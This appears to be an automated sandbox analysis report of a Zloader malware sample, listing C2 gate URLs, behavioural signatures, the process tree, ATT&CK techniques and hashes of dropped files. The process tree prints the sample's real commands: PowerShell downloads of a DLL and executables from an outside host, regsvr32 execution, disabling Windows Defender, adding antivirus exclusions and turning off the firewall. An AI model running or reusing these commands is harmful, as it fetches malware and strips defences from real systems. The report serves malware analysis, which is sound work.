Analysis

  • max time kernel
    43s
  • max time network
    181s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    06-08-2021 08:18

Errors

Reason
Remote task has failed: Machine shutdown

General

  • Target

    aac2b6314988e0aea824fe0a53b917c1.exe

  • Size

    165KB

  • MD5

    aac2b6314988e0aea824fe0a53b917c1

  • SHA1

    17c0d629b7a2f940e7a69f1120582cf89f70355a

  • SHA256

    6c8e5f1670515c6a9d3cdcafe6d9a782a87f0f085095558cc0116ea73281c059

  • SHA512

    0245fb86597e7106ef24a7348b9251fbf3936ff3643f372bea90b0c736c1275695012ce699d47c709597c1972c6a2af977507ba7378eefa5a73afeea48559715

Malware Config

Extracted

Family

zloader

Botnet

vasja

Campaign

vasja

C2

https://iqowijsdakm.com/gate.php

https://wiewjdmkfjn.com/gate.php

https://dksaoidiakjd.com/gate.php

https://iweuiqjdakjd.com/gate.php

https://yuidskadjna.com/gate.php

https://olksmadnbdj.com/gate.php

https://odsakmdfnbs.com/gate.php

https://odsakjmdnhsaj.com/gate.php

https://odjdnhsaj.com/gate.php

https://odoishsaj.com/gate.php

rc4.plain
rsa_pubkey.plain

Signatures

  • Zloader, Terdot, DELoader, ZeusSphinx

    Zloader is a malware strain that was initially discovered back in August 2015.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 1 TTPs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\aac2b6314988e0aea824fe0a53b917c1.exe
    "C:\Users\Admin\AppData\Local\Temp\aac2b6314988e0aea824fe0a53b917c1.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:564
    • C:\Windows\system32\cmd.exe
      cmd /c start.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:684
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Invoke-WebRequest https://gucdhwpcfjmmcefypliv.com/JavaE.dll -OutFile JavaE.dll
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1504
      • C:\Windows\system32\regsvr32.exe
        regsvr32 JavaE.dll
        3⤵
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious use of WriteProcessMemory
        PID:1808
        • C:\Windows\SysWOW64\regsvr32.exe
          JavaE.dll
          4⤵
          • Loads dropped DLL
          PID:1156
          • C:\Windows\SysWOW64\msiexec.exe
            msiexec.exe
            5⤵
              PID:780
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Invoke-WebRequest https://gucdhwpcfjmmcefypliv.com/nsudo.bat -OutFile nsudo.bat
          3⤵
            PID:1896
          • C:\Windows\system32\cmd.exe
            cmd /c nsudo.bat
            3⤵
              PID:1432
              • C:\Windows\system32\cacls.exe
                "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
                4⤵
                  PID:1428
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Invoke-WebRequest https://gucdhwpcfjmmcefypliv.com/javase.exe -OutFile javase.exe
                  4⤵
                    PID:924
                  • C:\Users\Admin\AppData\Roaming\javase.exe
                    javase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
                    4⤵
                      PID:1160
                    • C:\Users\Admin\AppData\Roaming\javase.exe
                      javase -U:T sc config WinDefend start= disabled
                      4⤵
                        PID:1720
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionProcess '"C:\Users\Admin\AppData\Roaming'"
                        4⤵
                          PID:1832
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe -command "Add-MpPreference -ExclusionProcess "regsvr32""
                          4⤵
                            PID:1544
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell.exe -command "Add-MpPreference -ExclusionProcess ".exe""
                            4⤵
                              PID:948
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell.exe -command "Add-MpPreference -ExclusionProcess "iexplorer.exe""
                              4⤵
                                PID:1524
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell.exe -command "Add-MpPreference -ExclusionProcess "explorer.exe""
                                4⤵
                                  PID:1272
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell.exe -command "Add-MpPreference -ExclusionProcess ".dll""
                                  4⤵
                                    PID:268
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell.exe -command "netsh advfirewall set allprofiles state off"
                                    4⤵
                                      PID:1792
                                      • C:\Windows\system32\netsh.exe
                                        "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                                        5⤵
                                          PID:1544
                                      • C:\Windows\system32\shutdown.exe
                                        shutdown.exe /r /t 00
                                        4⤵
                                          PID:1948
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell Restart-Computer
                                          4⤵
                                            PID:1532
                                        • C:\Windows\system32\timeout.exe
                                          timeout 20
                                          3⤵
                                          • Delays execution with timeout.exe
                                          PID:1288
                                    • C:\Windows\system32\LogonUI.exe
                                      "LogonUI.exe" /flags:0x0
                                      1⤵
                                        PID:948
                                      • C:\Windows\system32\AUDIODG.EXE
                                        C:\Windows\system32\AUDIODG.EXE 0x194
                                        1⤵
                                          PID:1936
                                        • C:\Windows\system32\LogonUI.exe
                                          "LogonUI.exe" /flags:0x1
                                          1⤵
                                            PID:2032

                                          Network

                                          MITRE ATT&CK Matrix ATT&CK v6

                                          Persistence

                                          Modify Existing Service

                                          1
                                          T1031

                                          Registry Run Keys / Startup Folder

                                          1
                                          T1060

                                          Defense Evasion

                                          Modify Registry

                                          1
                                          T1112

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1a79b9a3-5065-486c-ad3b-710a75559118
                                            MD5

                                            6f0d509e28be1af95ba237d4f43adab4

                                            SHA1

                                            c665febe79e435843553bee86a6cea731ce6c5e4

                                            SHA256

                                            f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

                                            SHA512

                                            8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3b2e6f6c-288b-41f6-9eb5-1e639c150f2f
                                            MD5

                                            a70ee38af4bb2b5ed3eeb7cbd1a12fa3

                                            SHA1

                                            81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

                                            SHA256

                                            dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

                                            SHA512

                                            8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4a7237c6-5cfa-4e18-9ff5-dffd9eb5e07f
                                            MD5

                                            d89968acfbd0cd60b51df04860d99896

                                            SHA1

                                            b3c29916ccb81ce98f95bbf3aa8a73de16298b29

                                            SHA256

                                            1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

                                            SHA512

                                            b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a058edc2-186b-4ae6-93a1-dce373438f8b
                                            MD5

                                            e5b3ba61c3cf07deda462c9b27eb4166

                                            SHA1

                                            b324dad73048be6e27467315f82b7a5c1438a1f9

                                            SHA256

                                            b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925

                                            SHA512

                                            a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a104556a-0165-40a5-84a2-248e1aa81336
                                            MD5

                                            7f79b990cb5ed648f9e583fe35527aa7

                                            SHA1

                                            71b177b48c8bd745ef02c2affad79ca222da7c33

                                            SHA256

                                            080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

                                            SHA512

                                            20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d8f1a120-64f2-4479-b968-0a8c71fe8cfd
                                            MD5

                                            faa37917b36371249ac9fcf93317bf97

                                            SHA1

                                            a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4

                                            SHA256

                                            b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132

                                            SHA512

                                            614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ec8c071f-a681-4be9-814e-23fbd072db5d
                                            MD5

                                            2d5cd190b5db0620cd62e3cd6ba1dcd3

                                            SHA1

                                            ff4f229f4fbacccdf11d98c04ba756bda80aac7a

                                            SHA256

                                            ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

                                            SHA512

                                            edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                            MD5

                                            9086ce5428db6690c9074c261269852b

                                            SHA1

                                            ae15f4190aa39e94b3292cd5ee2e88429f9b3b7b

                                            SHA256

                                            38afcec3f26d8d36476ea2120572c64b3c3760b3862ba3bfaa104a7e20bfd2ef

                                            SHA512

                                            c668a23a06caf8c24dcc310357aa85f2264931708c8dd150a31dc7272a76b9bd35605a8e8e3819ee24c54e206079ca754b2683aafe284ffbbffb65f348bdbcdd

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                            MD5

                                            179ca4d70669bbb2fe93c22c3c811d20

                                            SHA1

                                            8e186eeac545125629cb4c4e15834fb314fd99cf

                                            SHA256

                                            1f1f2823b821095dabc77fe339a0e2105ff1892c18b07fcdd5858d313009b022

                                            SHA512

                                            8b042b3a9ba247b3583eab544b2139402fed451b2f7c176fd59ab247574caad87a27abff5527fa2427753596e316d589ff5c0c80fbb49a580d5b304d84b865a9

                                          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\start.bat
                                            MD5

                                            eec559fabd6ec7024f586fb3a1754fac

                                            SHA1

                                            f7498a978c2ed501a3b5d8478cdbd60a72a2d60a

                                            SHA256

                                            30892cefd5d62af5c37c7b431c0c03cd90c8bcb795d4c7c0db97b087e2cdf4be

                                            SHA512

                                            8010da9eb8b00079411aff2bbca28e0d778c3a9fdd1fe299d0f42d61f435e161af54e14079ad3dbbfa9b0592817d453f1305b91879cd5e8f4a6968481e20ee17

                                          • C:\Users\Admin\AppData\Roaming\JavaE.dll
                                            MD5

                                            86cef6c066a05b3f67123fbf638b6b01

                                            SHA1

                                            81618f8ecc48541c219aa974e4b16cab8f34203b

                                            SHA256

                                            86c37d778f584a2a3090ab170c8cd2fb3ddf952cde689b4c5a1efd74fc113a05

                                            SHA512

                                            1132f94eeb8ae5d4556841976789b648f2394a4089db2e6b43c2047cc87004f00e334e14a96c5ab0535aeb13f3bffc8d5e955d7435b9be2aba491bcbe92044d9

                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                            MD5

                                            ad6c57ff8caa16117325a583fd7b38b1

                                            SHA1

                                            4c2138d05ab2a14d8e992c5e50f9b50d4b991368

                                            SHA256

                                            3429e7be998626352fcb463fd947a7bbd3fbf503fbec04346ea710866b169a53

                                            SHA512

                                            467e2d235e3d7ee80c23316010921447163dbcb8a985c881d18ecc19e0f7604e483dfa48254290f355764e666ea7990bf8aadfdd50e7bd62c46978ba3078de78

                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                            MD5

                                            ad6c57ff8caa16117325a583fd7b38b1

                                            SHA1

                                            4c2138d05ab2a14d8e992c5e50f9b50d4b991368

                                            SHA256

                                            3429e7be998626352fcb463fd947a7bbd3fbf503fbec04346ea710866b169a53

                                            SHA512

                                            467e2d235e3d7ee80c23316010921447163dbcb8a985c881d18ecc19e0f7604e483dfa48254290f355764e666ea7990bf8aadfdd50e7bd62c46978ba3078de78

                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                            MD5

                                            ad6c57ff8caa16117325a583fd7b38b1

                                            SHA1

                                            4c2138d05ab2a14d8e992c5e50f9b50d4b991368

                                            SHA256

                                            3429e7be998626352fcb463fd947a7bbd3fbf503fbec04346ea710866b169a53

                                            SHA512

                                            467e2d235e3d7ee80c23316010921447163dbcb8a985c881d18ecc19e0f7604e483dfa48254290f355764e666ea7990bf8aadfdd50e7bd62c46978ba3078de78

                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                            MD5

                                            ad6c57ff8caa16117325a583fd7b38b1

                                            SHA1

                                            4c2138d05ab2a14d8e992c5e50f9b50d4b991368

                                            SHA256

                                            3429e7be998626352fcb463fd947a7bbd3fbf503fbec04346ea710866b169a53

                                            SHA512

                                            467e2d235e3d7ee80c23316010921447163dbcb8a985c881d18ecc19e0f7604e483dfa48254290f355764e666ea7990bf8aadfdd50e7bd62c46978ba3078de78

                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                            MD5

                                            ad6c57ff8caa16117325a583fd7b38b1

                                            SHA1

                                            4c2138d05ab2a14d8e992c5e50f9b50d4b991368

                                            SHA256

                                            3429e7be998626352fcb463fd947a7bbd3fbf503fbec04346ea710866b169a53

                                            SHA512

                                            467e2d235e3d7ee80c23316010921447163dbcb8a985c881d18ecc19e0f7604e483dfa48254290f355764e666ea7990bf8aadfdd50e7bd62c46978ba3078de78

                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                            MD5

                                            ad6c57ff8caa16117325a583fd7b38b1

                                            SHA1

                                            4c2138d05ab2a14d8e992c5e50f9b50d4b991368

                                            SHA256

                                            3429e7be998626352fcb463fd947a7bbd3fbf503fbec04346ea710866b169a53

                                            SHA512

                                            467e2d235e3d7ee80c23316010921447163dbcb8a985c881d18ecc19e0f7604e483dfa48254290f355764e666ea7990bf8aadfdd50e7bd62c46978ba3078de78

                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                            MD5

                                            ad6c57ff8caa16117325a583fd7b38b1

                                            SHA1

                                            4c2138d05ab2a14d8e992c5e50f9b50d4b991368

                                            SHA256

                                            3429e7be998626352fcb463fd947a7bbd3fbf503fbec04346ea710866b169a53

                                            SHA512

                                            467e2d235e3d7ee80c23316010921447163dbcb8a985c881d18ecc19e0f7604e483dfa48254290f355764e666ea7990bf8aadfdd50e7bd62c46978ba3078de78

                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                            MD5

                                            ad6c57ff8caa16117325a583fd7b38b1

                                            SHA1

                                            4c2138d05ab2a14d8e992c5e50f9b50d4b991368

                                            SHA256

                                            3429e7be998626352fcb463fd947a7bbd3fbf503fbec04346ea710866b169a53

                                            SHA512

                                            467e2d235e3d7ee80c23316010921447163dbcb8a985c881d18ecc19e0f7604e483dfa48254290f355764e666ea7990bf8aadfdd50e7bd62c46978ba3078de78

                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                            MD5

                                            ad6c57ff8caa16117325a583fd7b38b1

                                            SHA1

                                            4c2138d05ab2a14d8e992c5e50f9b50d4b991368

                                            SHA256

                                            3429e7be998626352fcb463fd947a7bbd3fbf503fbec04346ea710866b169a53

                                            SHA512

                                            467e2d235e3d7ee80c23316010921447163dbcb8a985c881d18ecc19e0f7604e483dfa48254290f355764e666ea7990bf8aadfdd50e7bd62c46978ba3078de78

                                          • C:\Users\Admin\AppData\Roaming\javase.exe
                                            MD5

                                            5cae01aea8ed390ce9bec17b6c1237e4

                                            SHA1

                                            3a80a49efaac5d839400e4fb8f803243fb39a513

                                            SHA256

                                            19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

                                            SHA512

                                            c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

                                          • C:\Users\Admin\AppData\Roaming\javase.exe
                                            MD5

                                            5cae01aea8ed390ce9bec17b6c1237e4

                                            SHA1

                                            3a80a49efaac5d839400e4fb8f803243fb39a513

                                            SHA256

                                            19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

                                            SHA512

                                            c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

                                          • C:\Users\Admin\AppData\Roaming\nsudo.bat
                                            MD5

                                            06005e9cf3aec2b86a3be78623683b46

                                            SHA1

                                            f7e3d83dd9466eeb8b7e4cf3322a08e757a6b63a

                                            SHA256

                                            1f9e24e527f702f5f4a7f65a776df38b2d4240d8e3f13713045cab3466746272

                                            SHA512

                                            bb99a6ad1da80692a12f9079bf3be80bd656fa4eb4aef59b1a64affebc5b8a95525c0ebed1bd186cf30493cbba85fc49d1093472bdc3027608daa05fde302323

                                          • \??\PIPE\srvsvc
                                            MD5

                                            d41d8cd98f00b204e9800998ecf8427e

                                            SHA1

                                            da39a3ee5e6b4b0d3255bfef95601890afd80709

                                            SHA256

                                            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                            SHA512

                                            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                          • \??\PIPE\srvsvc
                                            MD5

                                            d41d8cd98f00b204e9800998ecf8427e

                                            SHA1

                                            da39a3ee5e6b4b0d3255bfef95601890afd80709

                                            SHA256

                                            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                            SHA512

                                            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                          • \??\PIPE\srvsvc
                                            MD5

                                            d41d8cd98f00b204e9800998ecf8427e

                                            SHA1

                                            da39a3ee5e6b4b0d3255bfef95601890afd80709

                                            SHA256

                                            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                            SHA512

                                            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                          • \??\PIPE\srvsvc
                                            MD5

                                            d41d8cd98f00b204e9800998ecf8427e

                                            SHA1

                                            da39a3ee5e6b4b0d3255bfef95601890afd80709

                                            SHA256

                                            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                            SHA512

                                            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                          • \Users\Admin\AppData\Roaming\JavaE.dll
                                            MD5

                                            86cef6c066a05b3f67123fbf638b6b01

                                            SHA1

                                            81618f8ecc48541c219aa974e4b16cab8f34203b

                                            SHA256

                                            86c37d778f584a2a3090ab170c8cd2fb3ddf952cde689b4c5a1efd74fc113a05

                                            SHA512

                                            1132f94eeb8ae5d4556841976789b648f2394a4089db2e6b43c2047cc87004f00e334e14a96c5ab0535aeb13f3bffc8d5e955d7435b9be2aba491bcbe92044d9

                                          • \Users\Admin\AppData\Roaming\javase.exe
                                            MD5

                                            5cae01aea8ed390ce9bec17b6c1237e4

                                            SHA1

                                            3a80a49efaac5d839400e4fb8f803243fb39a513

                                            SHA256

                                            19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

                                            SHA512

                                            c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

                                          • \Users\Admin\AppData\Roaming\javase.exe
                                            MD5

                                            5cae01aea8ed390ce9bec17b6c1237e4

                                            SHA1

                                            3a80a49efaac5d839400e4fb8f803243fb39a513

                                            SHA256

                                            19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

                                            SHA512

                                            c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

                                          • memory/268-195-0x000000001AC70000-0x000000001AC72000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/268-196-0x000000001AC74000-0x000000001AC76000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/268-187-0x0000000000000000-mapping.dmp
                                          • memory/564-59-0x000007FEFBF71000-0x000007FEFBF73000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/684-60-0x0000000000000000-mapping.dmp
                                          • memory/780-88-0x0000000000090000-0x00000000000B6000-memory.dmp
                                            Filesize

                                            152KB

                                          • memory/780-79-0x0000000000000000-mapping.dmp
                                          • memory/924-100-0x00000000023E0000-0x00000000023E1000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/924-101-0x000000001ACE0000-0x000000001ACE1000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/924-102-0x0000000002570000-0x0000000002571000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/924-103-0x000000001AC60000-0x000000001AC62000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/924-104-0x000000001AC64000-0x000000001AC66000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/924-105-0x0000000002420000-0x0000000002421000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/924-106-0x000000001C320000-0x000000001C321000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/924-96-0x0000000000000000-mapping.dmp
                                          • memory/948-212-0x0000000002840000-0x0000000002841000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/948-166-0x000000001AC24000-0x000000001AC26000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/948-165-0x000000001AC20000-0x000000001AC22000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/948-159-0x0000000000000000-mapping.dmp
                                          • memory/1156-75-0x00000000757C1000-0x00000000757C3000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1156-78-0x0000000010000000-0x0000000010148000-memory.dmp
                                            Filesize

                                            1.3MB

                                          • memory/1156-77-0x0000000000170000-0x00000000001F0000-memory.dmp
                                            Filesize

                                            512KB

                                          • memory/1156-74-0x0000000000000000-mapping.dmp
                                          • memory/1160-108-0x0000000000000000-mapping.dmp
                                          • memory/1272-184-0x000000001AC94000-0x000000001AC96000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1272-183-0x000000001AC90000-0x000000001AC92000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1272-178-0x0000000000000000-mapping.dmp
                                          • memory/1428-95-0x0000000000000000-mapping.dmp
                                          • memory/1432-93-0x0000000000000000-mapping.dmp
                                          • memory/1504-68-0x0000000001EF0000-0x0000000001EF1000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1504-66-0x000000001ACD0000-0x000000001ACD2000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1504-62-0x0000000000000000-mapping.dmp
                                          • memory/1504-64-0x0000000001CA0000-0x0000000001CA1000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1504-65-0x000000001AD50000-0x000000001AD51000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1504-70-0x000000001B8C0000-0x000000001B8C1000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1504-69-0x0000000002090000-0x0000000002091000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1504-67-0x000000001ACD4000-0x000000001ACD6000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1524-175-0x000000001ABB4000-0x000000001ABB6000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1524-168-0x0000000000000000-mapping.dmp
                                          • memory/1524-174-0x000000001ABB0000-0x000000001ABB2000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1532-210-0x0000000000000000-mapping.dmp
                                          • memory/1544-148-0x000000001A9E4000-0x000000001A9E6000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1544-206-0x0000000000000000-mapping.dmp
                                          • memory/1544-147-0x000000001A9E0000-0x000000001A9E2000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1544-141-0x0000000000000000-mapping.dmp
                                          • memory/1720-111-0x0000000000000000-mapping.dmp
                                          • memory/1792-204-0x000000001AAC4000-0x000000001AAC6000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1792-202-0x000000001AAC0000-0x000000001AAC2000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1792-197-0x0000000000000000-mapping.dmp
                                          • memory/1808-71-0x0000000000000000-mapping.dmp
                                          • memory/1832-115-0x0000000000000000-mapping.dmp
                                          • memory/1832-140-0x00000000028D0000-0x00000000028D1000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1832-139-0x00000000028C0000-0x00000000028C1000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1832-127-0x00000000026D0000-0x00000000026D1000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1832-124-0x00000000026A0000-0x00000000026A1000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1832-123-0x000000001ADD4000-0x000000001ADD6000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1832-122-0x000000001ADD0000-0x000000001ADD2000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1832-121-0x00000000023F0000-0x00000000023F1000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1832-120-0x00000000023C0000-0x00000000023C1000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1832-119-0x000000001AE50000-0x000000001AE51000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1832-118-0x0000000001F90000-0x0000000001F91000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1896-92-0x000000001B750000-0x000000001B751000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1896-90-0x0000000002540000-0x0000000002541000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1896-89-0x000000001ACD4000-0x000000001ACD6000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1896-87-0x000000001ACD0000-0x000000001ACD2000-memory.dmp
                                            Filesize

                                            8KB

                                          • memory/1896-86-0x00000000025E0000-0x00000000025E1000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1896-85-0x000000001AD50000-0x000000001AD51000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1896-84-0x0000000002410000-0x0000000002411000-memory.dmp
                                            Filesize

                                            4KB

                                          • memory/1896-80-0x0000000000000000-mapping.dmp
                                          • memory/1948-208-0x0000000000000000-mapping.dmp
                                          • memory/2032-214-0x00000000026D0000-0x00000000026D1000-memory.dmp
                                            Filesize

                                            4KB